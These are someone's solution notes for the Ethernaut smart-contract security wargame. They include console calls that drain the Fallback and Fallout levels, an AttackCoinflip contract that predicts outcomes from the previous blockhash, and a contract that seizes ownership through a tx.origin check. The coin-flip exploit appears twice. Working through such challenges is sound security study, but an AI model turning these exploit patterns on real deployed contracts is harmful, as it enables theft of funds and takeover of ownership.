ethernauts notes

Ethernaut - Q1.md

Question 1 - Logic / Bad coding Flaws

you can use this to call the contribute method:

contract.methods["contribute()"].sendTransaction({value: 2});

or

sendTransaction({ from: "0x111" , to: instance, value:1, data: web3.eth.abi.encodeFunctionSignature('contribute()')

for functions with params, data field can be created like so:

web3.eth.abi.encodeFunctionCall({ name: 'myMethod', type: 'function', inputs: [{ type: 'uint256', name: 'myNumber' },{ type: 'string', name: 'myString' }] }, ['2345675643', 'Hello!%']);

// Drain in console and click submit and done contract.withdraw();

Ethernaut - Q2.md

Question 2

// in console call contract.Fal1out

submit, and done

Ethernaut - Q29 Switch .md

Q29 Switch

Ethernaut - Q3.md

Q3

Deploy this on REMIX - Set ENV as metamask

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "hardhat/console.sol";

contract Target {
    function flip(bool _guess) public returns (bool){}   
}

contract AttackCoinflip {
    uint256 public consecutiveWins;
    uint256 lastHash;
    uint256 FACTOR =
        57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor() {
        consecutiveWins = 0;
    }

    function guess() public returns (bool) {
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) {
            revert();
        }

        lastHash = blockValue;
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;

        return side;
    }

    function attack(address target) public {
        Target tg = Target(target);
        tg.flip(guess());
    }
}

use remix and call function attack

call attack function and paste the instance smart contract address as parameter

do it 10 times and done!

Ethernaut - Q4 Telephone.md

Q4

this is about understanding tx.origin vs msg.sender() best practice is not to check tx.origin, but rather the msg.sender();

compose attack contract and deploy via remix

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}

contract AttackTelephone {
    function attack(address tgt) public {

        Telephone target = Telephone(tgt);
        target.changeOwner(0xcf801268E6b45101cd974d1038b8986EDffE3D9F);
    }
}

call the attack function and paste the level instance smart contract address into it.

as above

Ethernaut - Q4.md

Q4

Deploy this on REMIX - Set ENV as metamask

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "hardhat/console.sol";

contract Target {
    function flip(bool _guess) public returns (bool){}   
}

contract AttackCoinflip {
    uint256 public consecutiveWins;
    uint256 lastHash;
    uint256 FACTOR =
        57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor() {
        consecutiveWins = 0;
    }

    function guess() public returns (bool) {
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) {
            revert();
        }

        lastHash = blockValue;
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;

        return side;
    }

    function attack(address target) public {
        Target tg = Target(target);
        tg.flip(guess());
    }
}

use remix and call function attack

call attack function and paste the instance smart contract address as parameter

do it 10 times and done!